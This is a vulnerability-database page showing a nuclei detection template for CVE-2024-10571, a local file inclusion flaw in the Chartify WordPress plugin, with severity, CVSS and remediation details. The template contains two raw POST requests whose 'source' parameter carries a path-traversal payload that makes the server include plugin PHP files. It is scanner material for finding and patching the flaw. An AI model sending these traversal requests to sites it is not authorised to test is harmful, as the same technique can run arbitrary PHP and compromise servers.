Lucene search
K

Chartify – WordPress Chart Plugin < 2.9.6 - Local File Inclusion

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

Chartify WordPress plugin version 2.9.5 and earlier has a Local File Inclusion vulnerability.

Related
Refs
Code
id: CVE-2024-10571

info:
  name: Chartify – WordPress Chart Plugin < 2.9.6 - Local File Inclusion
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    The Chartify – WordPress Chart Plugin plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.9.5 via the 'source' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
  impact: |
    Unauthenticated attackers can include and execute arbitrary PHP files via the source parameter, potentially achieving complete server compromise.
  remediation: |
    Update Chartify plugin to version 2.9.6 or later.
  reference:
    - https://plugins.trac.wordpress.org/browser/chart-builder/tags/2.9.6/admin/partials/charts/actions/chart-builder-charts-actions-options.php?rev=3184238
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/d4837258-c749-4194-926c-22b67e20c1fc?source=cve
    - https://github.com/RandomRobbieBF/CVE-2024-10571
    - https://nvd.nist.gov/vuln/detail/CVE-2024-10571
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10571
    cwe-id: CWE-98,NVD-CWE-Other
    epss-score: 0.04841
    epss-percentile: 0.90939
    cpe: cpe:2.3:a:ays-pro:chartify:*:*:*:*:free:wordpress:*:*
  metadata:
    vendor: ays-pro
    product: chartify
    framework: wordpress
    verified: true
    max-request: 2
    publicwww-query: "/wp-content/plugins/chart-builder/"
  tags: cve,cve2024,wp,wp-plugin,wordpress,chartify,chart-builder,lfi,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/admin/partials/features/chart-builder-plugin-featured-display&type=chart-js HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ays_chart_admin_ajax&function=display_plugin_charts_page&

    matchers:
      - type: word
        part: header
        words:
          - PHPSESSID
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../wp-content/plugins/chart-builder/uninstall&type=chart-js HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ays_chart_admin_ajax&function=display_plugin_charts_page

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "ays-chart-heading-box", "View Documentation")
          - status_code == 200
        condition: and
# digest: 490a004630440220793b48847f9b3069647a4d1b7b764e5d2be0a240e957c59fda4420a4d19ba5e902204ff2e18abc4a937eeb295da3eb1e2ae794a44fdb7206891e5f36c0153e438a35:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.19.8
EPSS0.04841
SSVC
42